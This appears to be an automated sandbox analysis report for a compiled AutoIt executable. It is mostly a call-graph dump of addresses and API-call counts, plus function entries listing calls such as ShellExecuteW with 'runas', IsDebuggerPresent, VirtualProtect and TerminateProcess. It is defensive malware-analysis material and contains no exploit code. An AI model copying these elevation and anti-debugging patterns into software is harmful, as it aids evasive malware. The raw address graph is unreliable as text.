Mailbox 88849->88902 88851 b28728 88850->88851 88851->88853 89008 afcc5c 87 API calls 4 library calls 88851->89008 88852 b287c8 89011 afcc5c 87 API calls 4 library calls 88852->89011 88853->88849 88860 abd7f7 48 API calls 88853->88860 88893 abf229 88853->88893 88899 abf3dd 88853->88899 88854 abfe30 332 API calls 88854->88902 88855 abf418 88868 b28b1b 88855->88868 88883 abf6aa 88855->88883 88855->88902 88859 b287a3 88858->88859 89010 ad0f0a 52 API calls __cinit 88859->89010 88863 b28772 88860->88863 88862 abf3f2 88862->88855 89012 af9af1 48 API calls 88862->89012 89009 ad0f0a 52 API calls __cinit 88863->89009 88864 abd6e9 55 API calls 88864->88902 88866 abf770 88871 b28a45 88866->88871 88888 abf77a 88866->88888 88877 b28bcf 88868->88877 88878 b28b2c 88868->88878 88869 b28c53 89026 afcc5c 87 API calls 4 library calls 88869->89026 88870 b28810 89013 b0eef8 332 API calls 88870->89013 89018 acc1af 48 API calls 88871->89018 88872 abfe30 332 API calls 88872->88883 88873 b28b7e 89021 b0e40a 332 API calls Mailbox 88873->89021 89023 afcc5c 87 API calls 4 library calls 88877->89023 89020 b0f5ee 332 API calls 88878->89020 88879 b28beb 89024 b0bdbd 332 API calls Mailbox 88879->89024 88882 ac1b90 48 API calls 88882->88902 88883->88866 88883->88872 88890 abfce0 88883->88890 88883->88902 88911 abf537 Mailbox 88883->88911 88885 ac1b90 48 API calls 88885->88902 88888->88882 88889 b28c00 88889->88911 89025 afcc5c 87 API calls 4 library calls 88889->89025 88890->88911 89022 afcc5c 87 API calls 4 library calls 88890->89022 88892 b28823 88892->88855 88895 b2884b 88892->88895 88893->88849 88893->88855 88893->88899 88893->88902 88894 afcc5c 87 API calls 88894->88902 89014 b0ccdc 48 API calls 88895->89014 88896 abdd47 48 API calls 88896->88902 88899->88852 88899->88862 88899->88902 88900 b28857 88903 b28865 88900->88903 88904 b288aa 88900->88904 88902->88854 88902->88864 88902->88869 88902->88873 88902->88879 88902->88885 88902->88890 88902->88894 88902->88896 88902->88911 89019 ae97ed InterlockedDecrement 88902->89019 89027 acc1af 48 API calls 88902->89027 89015 af9b72 48 API calls 88903->89015 88907 b288a0 Mailbox 88904->88907 89016 afa69d 48 API calls 88904->89016 88905 abfe30 332 API calls 88905->88911 88907->88905 88909 b288e7 89017 abbc74 48 API calls 88909->89017 88911->88000 88913 ac479f 88912->88913 88914 ac4637 88912->88914 88917 abce19 48 API calls 88913->88917 88915 b26e05 88914->88915 88916 ac4643 88914->88916 89082 b0e822 88915->89082 89081 ac4300 332 API calls _memcpy_s 88916->89081 88924 ac46e4 Mailbox 88917->88924 88920 ac4739 Mailbox 88920->88000 88921 b26e11 88921->88920 89122 afcc5c 87 API calls 4 library calls 88921->89122 88923 ac4659 88923->88920 88923->88921 88923->88924 88927 ab4252 84 API calls 88924->88927 89028 af6524 88924->89028 89031 affa0c 88924->89031 89072 b06ff0 88924->89072 88927->88920 88931 b2df42 88929->88931 88933 ace253 88929->88933 88930 b2df77 88931->88930 88932 b2df59 TranslateAcceleratorW 88931->88932 88932->88933 88933->88000 88935 acdca3 88934->88935 88936 acdc71 88934->88936 88935->88000 88936->88935 88937 acdc96 IsDialogMessageW 88936->88937 88938 b2dd1d GetClassLongW 88936->88938 88937->88935 88937->88936 88938->88936 88938->88937 88939->88000 89230 abbd30 88940->89230 88942 ac3267 88963 ac3313 _memcpy_s Mailbox 88942->88963 89242 acc36b 87 API calls 88942->89242 88944 afcc5c 87 API calls 88944->88963 88947 abfe30 332 API calls 88947->88963 88948 abd645 53 API calls 88948->88963 88950 acc2d6 48 API calls 88950->88963 88952 abd6e9 55 API calls 88952->88963 88956 acc3c3 48 API calls 88956->88963 88957 acf4ea 48 API calls 88957->88963 88960 abe8d0 332 API calls 88960->88963 88961 ab6eed 48 API calls 88961->88963 88963->88944 88963->88947 88963->88948 88963->88950 88963->88952 88963->88956 88963->88957 88963->88960 88963->88961 88964 abdcae 50 API calls 88963->88964 88965 ac3635 Mailbox 88963->88965 89235 ab2b7a 88963->89235 89243 abd9a0 53 API calls __cinit 88963->89243 89244 abd8c0 53 API calls 88963->89244 89245 b0f320 332 API calls 88963->89245 89246 b0f5ee 332 API calls 88963->89246 89247 ab1caa 49 API calls 88963->89247 89248 b0cda2 83 API calls Mailbox 88963->89248 89249 af80e3 53 API calls 88963->89249 89250 abd764 55 API calls 88963->89250 89251 afc942 50 API calls 88963->89251 88964->88963 88965->88000 88966->87953 88967->87947 88968->87952 88969->88000 88970->88000 88971->87996 88972->87996 88973->87996 88975 abfe50 88974->88975 89000 abfe7e 88974->89000 88976 acf4ea 48 API calls 88975->88976 88976->89000 88977 ac146e 88978 ab6eed 48 API calls 88977->88978 89001 abffe1 88978->89001 88979 ac1473 89257 afcc5c 87 API calls 4 library calls 88979->89257 88980 abd7f7 48 API calls 88980->89000 88981 ac0509 89258 afcc5c 87 API calls 4 library calls 88981->89258 88985 acf4ea 48 API calls 88985->89000 88986 b2a246 88988 ab6eed 48 API calls 88986->88988 88987 b2a922 88987->88000 88988->89001 88990 ab6eed 48 API calls 88990->89000 88992 b2a873 88992->88000 88993 ae97ed InterlockedDecrement 88993->89000 88994 b2a30e 88994->89001 89255 ae97ed InterlockedDecrement 88994->89255 88995 ad0f0a 52 API calls __cinit 88995->89000 88997 b2a973 89259 afcc5c 87 API calls 4 library calls 88997->89259 88999 b2a982 89000->88977 89000->88979 89000->88980 89000->88981 89000->88985 89000->88986 89000->88990 89000->88993 89000->88994 89000->88995 89000->88997 89000->89001 89002 ac15b5 89000->89002 89253 ac1820 332 API calls 2 library calls 89000->89253 89254 ac1d10 59 API calls Mailbox 89000->89254 89001->88000 89256 afcc5c 87 API calls 4 library calls 89002->89256 89003->87996 89004->87996 89005->87996 89006->88844 89007->88846 89008->88853 89009->88893 89010->88902 89011->88911 89012->88870 89013->88892 89014->88900 89015->88907 89016->88909 89017->88907 89018->88902 89019->88902 89020->88902 89021->88890 89022->88911 89023->88911 89024->88889 89025->88911 89026->88911 89027->88902 89123 af6ca9 GetFileAttributesW 89028->89123 89032 affa1c __ftell_nolock 89031->89032 89033 affa44 89032->89033 89183 abd286 48 API calls 89032->89183 89035 ab936c 82 API calls 89033->89035 89036 affa5e 89035->89036 89037 affb68 89036->89037 89038 affa80 89036->89038 89047 affb92 89036->89047 89039 ab41a9 136 API calls 89037->89039 89040 ab936c 82 API calls 89038->89040 89041 affb79 89039->89041 89045 affa8c _wcscpy _wcschr 89040->89045 89042 affb8e 89041->89042 89044 ab41a9 136 API calls 89041->89044 89043 ab936c 82 API calls 89042->89043 89042->89047 89046 affbc7 89043->89046 89044->89042 89051 affab0 _wcscat _wcscpy 89045->89051 89055 affade _wcscat 89045->89055 89048 ad1dfc __wsplitpath 47 API calls 89046->89048 89047->88920 89056 affbeb _wcscat _wcscpy 89048->89056 89049 ab936c 82 API calls 89050 affafc _wcscpy 89049->89050 89184 af72cb GetFileAttributesW 89050->89184 89053 ab936c 82 API calls 89051->89053 89053->89055 89054 affb1c __wsetenvp 89054->89047 89055->89049 89060 ab936c 82 API calls 89056->89060 89073 ab936c 82 API calls 89072->89073 89074 b0702a 89073->89074 89075 abb470 92 API calls 89074->89075 89076 b0703a 89075->89076 89077 abfe30 332 API calls 89076->89077 89078 b0705f 89076->89078 89077->89078 89080 b07063 89078->89080 89221 abcdb9 48 API calls 89078->89221 89080->88920 89081->88923 89083 b0e868 89082->89083 89084 b0e84e 89082->89084 89223 b0ccdc 48 API calls 89083->89223 89222 afcc5c 87 API calls 4 library calls 89084->89222 89087 b0e871 89088 abfe30 331 API calls 89087->89088 89089 b0e8cf 89088->89089 89090 b0e96a 89089->89090 89092 b0e916 89089->89092 89105 b0e860 Mailbox 89089->89105 89091 b0e978 89090->89091 89094 b0e9c7 89090->89094 89225 afa69d 48 API calls 89091->89225 89224 af9b72 48 API calls 89092->89224 89097 ab936c 82 API calls 89094->89097 89094->89105 89096 b0e949 89099 ac45e0 331 API calls 89096->89099 89100 b0e9e1 89097->89100 89098 b0e99b 89226 abbc74 48 API calls 89098->89226 89099->89105 89102 abbdfa 48 API calls 89100->89102 89104 b0ea05 CharUpperBuffW 89102->89104 89103 b0e9a3 Mailbox 89107 ac3200 331 API calls 89103->89107 89106 b0ea1f 89104->89106 89105->88921 89108 b0ea72 89106->89108 89109 b0ea26 89106->89109 89107->89105 89227 af9b72 48 API calls 89109->89227 89122->88920 89124 af6529 89123->89124 89125 af6cc4 FindFirstFileW 89123->89125 89124->88920 89125->89124 89126 af6cd9 FindClose 89125->89126 89126->89124 89183->89033 89184->89054 89221->89080 89222->89105 89223->89087 89224->89096 89225->89098 89226->89103 89231 abbd3f 89230->89231 89234 abbd5a 89230->89234 89232 abbdfa 48 API calls 89231->89232 89233 abbd47 CharUpperBuffW 89232->89233 89233->89234 89234->88942 89236 ab2b8b 89235->89236 89237 b2436a 89235->89237 89238 acf4ea 48 API calls 89236->89238 89239 ab2b92 89238->89239 89240 ab2bb3 89239->89240 89252 ab2bce 48 API calls 89239->89252 89240->88963 89242->88963 89243->88963 89244->88963 89245->88963 89246->88963 89247->88963 89248->88963 89249->88963 89250->88963 89251->88963 89252->89240 89253->89000 89254->89000 89255->89001 89256->89001 89257->88992 89258->88987 89259->88999 89260 b29c06 89271 acd3be 89260->89271 89262 b29c1c 89263 b29c91 Mailbox 89262->89263 89280 ab1caa 49 API calls 89262->89280 89265 ac3200 332 API calls 89263->89265 89268 b29cc5 89265->89268 89267 b29c71 89267->89268 89281 afb171 48 API calls 89267->89281 89270 b2a7ab Mailbox 89268->89270 89282 afcc5c 87 API calls 4 library calls 89268->89282 89272 acd3dc 89271->89272 89273 acd3ca 89271->89273 89275 acd40b 89272->89275 89276 acd3e2 89272->89276 89283 abdcae 50 API calls Mailbox 89273->89283 89284 abdcae 50 API calls Mailbox 89275->89284 89279 acf4ea 48 API calls 89276->89279 89278 acd3d4 89278->89262 89279->89278 89280->89267 89281->89263 89282->89270 89283->89278 89284->89278 89285 b219cb 89290 ab2322 89285->89290 89287 b219d1 89323 ad0f0a 52 API calls __cinit 89287->89323 89289 b219db 89291 ab2344 89290->89291 89324 ab26df 89291->89324 89296 abd7f7 48 API calls 89297 ab2384 89296->89297 89298 abd7f7 48 API calls 89297->89298 89299 ab238e 89298->89299 89300 abd7f7 48 API calls 89299->89300 89301 ab2398 89300->89301 89302 abd7f7 48 API calls 89301->89302 89303 ab23de 89302->89303 89304 abd7f7 48 API calls 89303->89304 89305 ab24c1 89304->89305 89332 ab263f 89305->89332 89309 ab24f1 89310 abd7f7 48 API calls 89309->89310 89311 ab24fb 89310->89311 89361 ab2745 89311->89361 89313 ab2546 89314 ab2556 GetStdHandle 89313->89314 89315 ab25b1 89314->89315 89316 b2501d 89314->89316 89317 ab25b7 CoInitialize 89315->89317 89316->89315 89318 b25026 89316->89318 89317->89287 89368 af92d4 53 API calls 89318->89368 89320 b2502d 89369 af99f9 CreateThread 89320->89369 89322 b25039 CloseHandle 89322->89317 89323->89289 89370 ab2854 89324->89370 89327 ab6a63 48 API calls 89328 ab234a 89327->89328 89329 ab272e 89328->89329 89384 ab27ec 6 API calls 89329->89384 89331 ab237a 89331->89296 89333 abd7f7 48 API calls 89332->89333 89334 ab264f 89333->89334 89335 abd7f7 48 API calls 89334->89335 89336 ab2657 89335->89336 89385 ab26a7 89336->89385 89339 ab26a7 48 API calls 89340 ab2667 89339->89340 89341 abd7f7 48 API calls 89340->89341 89342 ab2672 89341->89342 89343 acf4ea 48 API calls 89342->89343 89344 ab24cb 89343->89344 89345 ab22a4 89344->89345 89346 ab22b2 89345->89346 89347 abd7f7 48 API calls 89346->89347 89348 ab22bd 89347->89348 89349 abd7f7 48 API calls 89348->89349 89350 ab22c8 89349->89350 89351 abd7f7 48 API calls 89350->89351 89352 ab22d3 89351->89352 89353 abd7f7 48 API calls 89352->89353 89354 ab22de 89353->89354 89355 ab26a7 48 API calls 89354->89355 89356 ab22e9 89355->89356 89357 acf4ea 48 API calls 89356->89357 89358 ab22f0 89357->89358 89359 ab22f9 RegisterWindowMessageW 89358->89359 89360 b21fe7 89358->89360 89359->89309 89362 ab2755 89361->89362 89363 b25f4d 89361->89363 89364 acf4ea 48 API calls 89362->89364 89390 afc942 50 API calls 89363->89390 89366 ab275d 89364->89366 89366->89313 89367 b25f58 89368->89320 89369->89322 89391 af99df 54 API calls 89369->89391 89377 ab2870 89370->89377 89373 ab2870 48 API calls 89374 ab2864 89373->89374 89375 abd7f7 48 API calls 89374->89375 89376 ab2716 89375->89376 89376->89327 89378 abd7f7 48 API calls 89377->89378 89379 ab287b 89378->89379 89380 abd7f7 48 API calls 89379->89380 89381 ab2883 89380->89381 89382 abd7f7 48 API calls 89381->89382 89383 ab285c 89382->89383 89383->89373 89384->89331 89386 abd7f7 48 API calls 89385->89386 89387 ab26b0 89386->89387 89388 abd7f7 48 API calls 89387->89388 89389 ab265f 89388->89389 89389->89339 89390->89367 89392 abb7b1 89401 abc62c 89392->89401 89394 abb7c2 89395 abb7ec 89394->89395 89409 abbc74 48 API calls 89394->89409 89411 abba85 48 API calls _memcpy_s 89395->89411 89398 abb7e0 89410 abba85 48 API calls _memcpy_s 89398->89410 89400 abb6b7 Mailbox 89402 abbcce 48 API calls 89401->89402 89403 abc63b 89402->89403 89404 b239fd 89403->89404 89406 abc68b 89403->89406 89408 abc799 48 API calls 89403->89408 89412 af26bc 89 API calls 4 library calls 89404->89412 89406->89394 89407 b23a0b 89408->89403 89409->89398 89410->89395 89411->89400 89412->89407 89413 abf030 89414 ac3b70 332 API calls 89413->89414 89415 abf03c 89414->89415 89416 b29bec 89449 ac0ae0 _memcpy_s Mailbox 89416->89449 89419 ac1526 Mailbox 89508 afcc5c 87 API calls 4 library calls 89419->89508 89421 acf4ea 48 API calls 89446 abfec8 89421->89446 89423 ac0509 89511 afcc5c 87 API calls 4 library calls 89423->89511 89424 ac146e 89431 ab6eed 48 API calls 89424->89431 89426 ab6eed 48 API calls 89426->89446 89427 ac1473 89510 afcc5c 87 API calls 4 library calls 89427->89510 89429 b2a246 89433 ab6eed 48 API calls 89429->89433 89430 b2a922 89447 abffe1 Mailbox 89431->89447 89433->89447 89436 b2a873 89437 b2a30e 89437->89447 89506 ae97ed InterlockedDecrement 89437->89506 89438 abd7f7 48 API calls 89438->89446 89439 abce19 48 API calls 89439->89449 89440 ae97ed InterlockedDecrement 89440->89446 89442 ad0f0a 52 API calls __cinit 89442->89446 89443 b2a973 89512 afcc5c 87 API calls 4 library calls 89443->89512 89445 b2a982 89446->89421 89446->89423 89446->89424 89446->89426 89446->89427 89446->89429 89446->89437 89446->89438 89446->89440 89446->89442 89446->89443 89446->89447 89448 ac15b5 89446->89448 89503 ac1820 332 API calls 2 library calls 89446->89503 89504 ac1d10 59 API calls Mailbox 89446->89504 89509 afcc5c 87 API calls 4 library calls 89448->89509 89449->89419 89449->89439 89449->89446 89449->89447 89450 b0e822 332 API calls 89449->89450 89451 abfe30 332 API calls 89449->89451 89452 b2a706 89449->89452 89454 acf4ea 48 API calls 89449->89454 89455 ae97ed InterlockedDecrement 89449->89455 89456 b06ff0 332 API calls 89449->89456 89459 b10d09 89449->89459 89462 b10d1d 89449->89462 89465 b0f0ac 89449->89465 89497 afa6ef 89449->89497 89505 b0ef61 83 API calls 2 library calls 89449->89505 89450->89449 89451->89449 89507 afcc5c 87 API calls 4 library calls 89452->89507 89454->89449 89455->89449 89456->89449 89513 b0f8ae 89459->89513 89461 b10d19 89461->89449 89463 b0f8ae 130 API calls 89462->89463 89464 b10d2d 89463->89464 89464->89449 89466 abd7f7 48 API calls 89465->89466 89467 b0f0c0 89466->89467 89468 abd7f7 48 API calls 89467->89468 89469 b0f0c8 89468->89469 89470 abd7f7 48 API calls 89469->89470 89471 b0f0d0 89470->89471 89472 ab936c 82 API calls 89471->89472 89482 b0f0de 89472->89482 89473 ab6a63 48 API calls 89473->89482 89474 b0f2f9 Mailbox 89474->89449 89475 b0f2b3 89479 ab518c 48 API calls 89475->89479 89477 b0f2ce 89481 ab518c 48 API calls 89477->89481 89478 ab6eed 48 API calls 89478->89482 89483 b0f2c0 89479->89483 89480 abc799 48 API calls 89480->89482 89484 b0f2dd 89481->89484 89482->89473 89482->89474 89482->89475 89482->89477 89482->89478 89482->89480 89485 abbdfa 48 API calls 89482->89485 89487 b0f2cc 89482->89487 89489 abbdfa 48 API calls 89482->89489 89494 ab936c 82 API calls 89482->89494 89495 ab518c 48 API calls 89482->89495 89496 ab510d 48 API calls 89482->89496 89486 ab510d 48 API calls 89483->89486 89488 ab510d 48 API calls 89484->89488 89490 b0f175 CharUpperBuffW 89485->89490 89486->89487 89487->89474 89615 ab6b68 48 API calls 89487->89615 89488->89487 89491 b0f23a CharUpperBuffW 89489->89491 89492 abd645 53 API calls 89490->89492 89614 acd922 55 API calls 2 library calls 89491->89614 89492->89482 89494->89482 89495->89482 89496->89482 89498 afa6fb 89497->89498 89499 acf4ea 48 API calls 89498->89499 89500 afa709 89499->89500 89501 afa717 89500->89501 89502 abd7f7 48 API calls 89500->89502 89501->89449 89502->89501 89503->89446 89504->89446 89505->89449 89506->89447 89507->89419 89508->89447 89509->89447 89510->89436 89511->89430 89512->89445 89514 ab936c 82 API calls 89513->89514 89515 b0f8ea 89514->89515 89517 b0f92c Mailbox 89515->89517 89549 b10567 89515->89549 89517->89461 89518 b0fb8b 89519 b0fcfa 89518->89519 89521 b0fb95 89518->89521 89597 b10688 90 API calls Mailbox 89519->89597 89562 b0f70a 89521->89562 89523 b0fd07 89523->89521 89524 b0fd13 89523->89524 89524->89517 89525 ab936c 82 API calls 89543 b0f984 Mailbox 89525->89543 89530 b0fbc9 89576 aced18 89530->89576 89533 b0fbe3 89595 afcc5c 87 API calls 4 library calls 89533->89595 89534 b0fbfd 89536 acc050 48 API calls 89534->89536 89538 b0fc14 89536->89538 89537 b0fbee GetCurrentProcess TerminateProcess 89537->89534 89539 ac1b90 48 API calls 89538->89539 89548 b0fc3e 89538->89548 89541 b0fc2d 89539->89541 89540 b0fd65 89540->89517 89545 b0fd7e FreeLibrary 89540->89545 89544 b1040f 106 API calls 89541->89544 89542 ac1b90 48 API calls 89542->89548 89543->89517 89543->89518 89543->89525 89543->89543 89593 b129e8 48 API calls _memcpy_s 89543->89593 89594 b0fda5 60 API calls 2 library calls 89543->89594 89544->89548 89545->89517 89548->89540 89548->89542 89580 b1040f 89548->89580 89596 abdcae 50 API calls Mailbox 89548->89596 89550 abbdfa 48 API calls 89549->89550 89551 b10582 CharLowerBuffW 89550->89551 89598 af1f11 89551->89598 89555 abd7f7 48 API calls 89556 b105bb 89555->89556 89605 ab69e9 48 API calls _memcpy_s 89556->89605 89558 b105d2 89560 abb18b 48 API calls 89558->89560 89559 b1061a Mailbox 89559->89543 89561 b105de Mailbox 89560->89561 89561->89559 89606 b0fda5 60 API calls 2 library calls 89561->89606 89563 b0f725 89562->89563 89567 b0f77a 89562->89567 89564 acf4ea 48 API calls 89563->89564 89565 b0f747 89564->89565 89566 acf4ea 48 API calls 89565->89566 89565->89567 89566->89565 89568 b10828 89567->89568 89569 b10a53 Mailbox 89568->89569 89575 b1084b _strcat _wcscpy __wsetenvp 89568->89575 89569->89530 89570 abcf93 58 API calls 89570->89575 89571 abd286 48 API calls 89571->89575 89572 ab936c 82 API calls 89572->89575 89573 ad395c 47 API calls __crtGetStringTypeA_stat 89573->89575 89575->89569 89575->89570 89575->89571 89575->89572 89575->89573 89609 af8035 50 API calls __wsetenvp 89575->89609 89577 aced2d 89576->89577 89578 acedc5 VirtualProtect 89577->89578 89579 aced93 89577->89579 89578->89579 89579->89533 89579->89534 89581 b10427 89580->89581 89582 b10443 89580->89582 89581->89582 89583 b104f8 89581->89583 89584 b1044f 89581->89584 89585 b1042e 89581->89585 89588 ad1c9d _free 47 API calls 89582->89588 89591 b1051e 89582->89591 89613 af9dc5 104 API calls 89583->89613 89612 abcdb9 48 API calls 89584->89612 89610 af7c56 50 API calls _strlen 89585->89610 89588->89591 89590 b10438 89611 abcdb9 48 API calls 89590->89611 89591->89548 89593->89543 89594->89543 89595->89537 89596->89548 89597->89523 89599 af1f3b __wsetenvp 89598->89599 89600 af1f79 89599->89600 89602 af1f6f 89599->89602 89603 af1ffa 89599->89603 89600->89555 89600->89561 89602->89600 89607 acd37a 60 API calls 89602->89607 89603->89600 89608 acd37a 60 API calls 89603->89608 89605->89558 89606->89559 89607->89602 89608->89603 89609->89575 89610->89590 89611->89582 89612->89582 89613->89582 89614->89482 89615->89474

                                                              Executed Functions

                                                              Function 00ADB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 744 adb043-adb080 call adf8a0 747 adb089-adb08b 744->747 748 adb082-adb084 744->748 750 adb08d-adb0a7 call ad7bda call ad7c0e call ad6e10 747->750 751 adb0ac-adb0d9 747->751 749 adb860-adb86c call ada70c 748->749 750->749 753 adb0db-adb0de 751->753 754 adb0e0-adb0e7 751->754 753->754 757 adb10b-adb110 753->757 758 adb0e9-adb100 call ad7bda call ad7c0e call ad6e10 754->758 759 adb105 754->759 762 adb11f-adb12d call ae3bf2 757->762 763 adb112-adb11c call adf82f 757->763 787 adb851-adb854 758->787 759->757 774 adb44b-adb45d 762->774 775 adb133-adb145 762->775 763->762 778 adb7b8-adb7d5 WriteFile 774->778 779 adb463-adb473 774->779 775->774 777 adb14b-adb183 call ad7a0d GetConsoleMode 775->777 777->774 800 adb189-adb18f 777->800 781 adb7d7-adb7df 778->781 782 adb7e1-adb7e7 GetLastError 778->782 784 adb479-adb484 779->784 785 adb55a-adb55f 779->785 788 adb7e9 781->788 782->788 792 adb81b-adb833 784->792 793 adb48a-adb49a 784->793 789 adb565-adb56e 785->789 790 adb663-adb66e 785->790 799 adb85e-adb85f 787->799 797 adb7ef-adb7f1 788->797 789->792 798 adb574 789->798 790->792 796 adb674 790->796 794 adb83e-adb84e call ad7c0e call ad7bda 792->794 795 adb835-adb838 792->795 801 adb4a0-adb4a3 793->801 794->787 795->794 802 adb83a-adb83c 795->802 803 adb67e-adb693 796->803 805 adb856-adb85c 797->805 806 adb7f3-adb7f5 797->806 807 adb57e-adb595 798->807 799->749 808 adb199-adb1bc GetConsoleCP 800->808 809 adb191-adb193 800->809 810 adb4e9-adb520 WriteFile 801->810 811 adb4a5-adb4be 801->811 802->799 815 adb699-adb69b 803->815 805->799 806->792 817 adb7f7-adb7fc 806->817 818 adb59b-adb59e 807->818 819 adb440-adb446 808->819 820 adb1c2-adb1ca 808->820 809->774 809->808 810->782 814 adb526-adb538 810->814 812 adb4cb-adb4e7 811->812 813 adb4c0-adb4ca 811->813 812->801 812->810 813->812 814->797 822 adb53e-adb54f 814->822 823 adb69d-adb6b3 815->823 824 adb6d8-adb719 WideCharToMultiByte 815->824 826 adb7fe-adb810 call ad7c0e call ad7bda 817->826 827 adb812-adb819 call ad7bed 817->827 828 adb5de-adb627 WriteFile 818->828 829 adb5a0-adb5b6 818->829 819->806 821 adb1d4-adb1d6 820->821 830 adb1dc-adb1fe 821->830 831 adb36b-adb36e 821->831 822->793 832 adb555 822->832 833 adb6b5-adb6c4 823->833 834 adb6c7-adb6d6 823->834 824->782 836 adb71f-adb721 824->836 826->787 827->787 828->782 841 adb62d-adb645 828->841 838 adb5cd-adb5dc 829->838 839 adb5b8-adb5ca 829->839 844 adb217-adb223 call ad1688 830->844 845 adb200-adb215 830->845 846 adb375-adb3a2 831->846 847 adb370-adb373 831->847 832->797 833->834 834->815 834->824 848 adb727-adb75a WriteFile 836->848 838->818 838->828 839->838 841->797 843 adb64b-adb658 841->843 843->807 850 adb65e 843->850 865 adb269-adb26b 844->865 866 adb225-adb239 844->866 851 adb271-adb283 call ae40f7 845->851 853 adb3a8-adb3ab 846->853 847->846 847->853 854 adb75c-adb776 848->854 855 adb77a-adb78e GetLastError 848->855 850->797 875 adb289 851->875 876 adb435-adb43b 851->876 858 adb3ad-adb3b0 853->858 859 adb3b2-adb3c5 call ae5884 853->859 854->848 861 adb778 854->861 863 adb794-adb796 855->863 858->859 867 adb407-adb40a 858->867 859->782 879 adb3cb-adb3d5 859->879 861->863 863->788 864 adb798-adb7b0 863->864 864->803 870 adb7b6 864->870 865->851 872 adb23f-adb254 call ae40f7 866->872 873 adb412-adb42d 866->873 867->821 871 adb410 867->871 870->797 871->876 872->876 886 adb25a-adb267 872->886 873->876 877 adb28f-adb2c4 WideCharToMultiByte 875->877 876->788 877->876 882 adb2ca-adb2f0 WriteFile 877->882 880 adb3fb-adb401 879->880 881 adb3d7-adb3ee call ae5884 879->881 880->867 881->782 889 adb3f4-adb3f5 881->889 882->782 885 adb2f6-adb30e 882->885 885->876 888 adb314-adb31b 885->888 886->877 888->880 890 adb321-adb34c WriteFile 888->890 889->880 890->782 891 adb352-adb359 890->891 891->876 892 adb35f-adb366 891->892 892->880
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 888972794361bd1c426b9b7b7a2be11cfd2123e9c774f2a92780fc9183e2d732
                                                              • Instruction ID: 1b7ca444fb604a78aa71b021a6353c046b5048ea78ef1d3982f56db5553ec1d8
                                                              • Opcode Fuzzy Hash: 888972794361bd1c426b9b7b7a2be11cfd2123e9c774f2a92780fc9183e2d732
                                                              • Instruction Fuzzy Hash: 26324B75A12229CBCB24CF18DD816E9B7B5FB46310F1941DAE40AE7B91D7309E80CF62
                                                              Function 00AB3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00AB3AA3,?), ref: 00AB3D45
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,00AB3AA3,?), ref: 00AB3D57
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B71148,00B71130,?,?,?,?,00AB3AA3,?), ref: 00AB3DC8
                                                                • Part of subcall function 00AB6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AB3DEE,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00AB6471
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,00AB3AA3,?), ref: 00AB3E48
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B628F4,00000010), ref: 00B21CCE
                                                              • SetCurrentDirectoryW.KERNEL32(?,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00B21D06
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B4DAB4,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00B21D89
                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,00AB3AA3), ref: 00B21D90
                                                                • Part of subcall function 00AB3E6E: GetSysColorBrush.USER32(0000000F), ref: 00AB3E79
                                                                • Part of subcall function 00AB3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00AB3E88
                                                                • Part of subcall function 00AB3E6E: LoadIconW.USER32(00000063), ref: 00AB3E9E
                                                                • Part of subcall function 00AB3E6E: LoadIconW.USER32(000000A4), ref: 00AB3EB0
                                                                • Part of subcall function 00AB3E6E: LoadIconW.USER32(000000A2), ref: 00AB3EC2
                                                                • Part of subcall function 00AB3E6E: RegisterClassExW.USER32(?), ref: 00AB3F30
                                                                • Part of subcall function 00AB36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB36E6
                                                                • Part of subcall function 00AB36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB3707
                                                                • Part of subcall function 00AB36B8: ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB371B
                                                                • Part of subcall function 00AB36B8: ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB3724
                                                                • Part of subcall function 00AB4FFC: _memset.LIBCMT ref: 00AB5022
                                                                • Part of subcall function 00AB4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB50CB
                                                              Strings
                                                              • runas, xrefs: 00B21D84
                                                              • This is a third-party compiled AutoIt script., xrefs: 00B21CC8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
